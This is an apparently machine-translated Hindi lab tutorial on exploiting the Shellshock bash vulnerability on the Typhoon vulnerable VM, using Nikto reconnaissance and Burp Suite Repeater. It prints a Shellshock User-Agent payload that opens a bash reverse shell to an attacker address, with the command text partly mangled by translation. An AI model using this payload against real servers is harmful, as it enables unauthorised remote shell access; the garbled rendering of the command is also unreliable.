शेलशॉक वल्नरेबिलिटी को कैसे उजागर करें

इस ट्यूटोरियल में, मैं आपको बदनाम शेलशॉक भेद्यता का फायदा उठाने के लिए दिखाता हूँ। मैं कवर करूंगा कि मेटासैप्लोइट के बिना ऐसा कैसे करूं और बर्प सूट का उपयोग कैसे करूं।

शेलशॉक वल्नरेबिलिटी क्या है?

वेब अनुरोधों के डेटा को CGI वेब सर्वर तकनीक में ठीक से संभाला नहीं गया है और इसलिए विशेष रूप से तैयार किए गए अनुरोध को भेजने पर गलत तरीके से आदेश का पालन किया जाता है।

जिसकी आपको जरूरत है

  • टाइफून 1.02 वल्लनब मशीन – वर्चुअलबॉक्स
  • काली लिनक्स वर्चुअल मशीन – वर्चुअलबॉक्स

टोह

Nikto का उपयोग करते हुए मैं लक्ष्य के वेब सर्वर पर ज्ञात कमजोरियों की गणना करता हूं।

कैसे शोषक भेद्यता शोषण

तो यह कहता है कि लक्ष्य शेलशॉक भेद्यता के लिए कमजोर है। मैं शोषण करने के लिए निम्नलिखित कमांड का उपयोग करने जा रहा हूं।

शेलशॉक वल्नरेबिलिटी को उजागर करें

एक विशेष रूप से तैयार किए गए बैश वन-लाइनर रिवर्स शेल का उपयोग करके मैं एक शेल वापस पाने के लिए शेलशॉक भेद्यता का फायदा उठा सकता हूं।

बर्प का उपयोग करके शेलशॉक का शोषण करें

आपने बर्प को आसान तरीके से स्थापित करने के लिए मेरे ट्यूटोरियल के माध्यम से निस्संदेह पढ़ा है और इसका मतलब है कि आप अगले चरण के लिए तैयार होने से केवल एक क्लिक दूर हैं।

नीचे दी गई छवि को करीब से देखें और देखें कि मैंने क्या किया है।

मैं अपने ट्यूटोरियल में दिखाए गए फॉक्सपॉक्सी प्रॉक्सी को चालू करता हूं जिसका मैंने अभी उल्लेख किया है। अगला मैं http: //typhoon-ip/cgi-bin/test.sh को खोलता हूं जैसा कि आप nikto स्कैन परिणामों से याद करते हैं, और Burp Suite खोलते हैं।

फिर मैं पुनरावर्तक (ctrl + r) का उपयोग करके अनुरोध भेज रहा हूं और अब मुझे इसे भेजने से पहले अनुरोध को बदलने के लिए तैयार किया गया है।

उपयोगकर्ता-एजेंट फ़ील्ड के बाद मैंने लक्ष्य पर निष्पादित होने के लिए बैश वन-लाइनर रिवर्स शेल में डाल दिया है।

उपभोक्ता अभिकर्ता: () { :; }; / बिन / बाश -आई> और /देव /tcp/10.0.0.2/1234 0> & 1

तो इस तरह से आप इस मामले में burp सुइट का उपयोग करके शेलशॉक भेद्यता का शोषण करते हैं, इस मामले में हम अपने शोषण का परीक्षण करने के लिए टायफून वल्नैनब मशीन का उपयोग कर रहे हैं।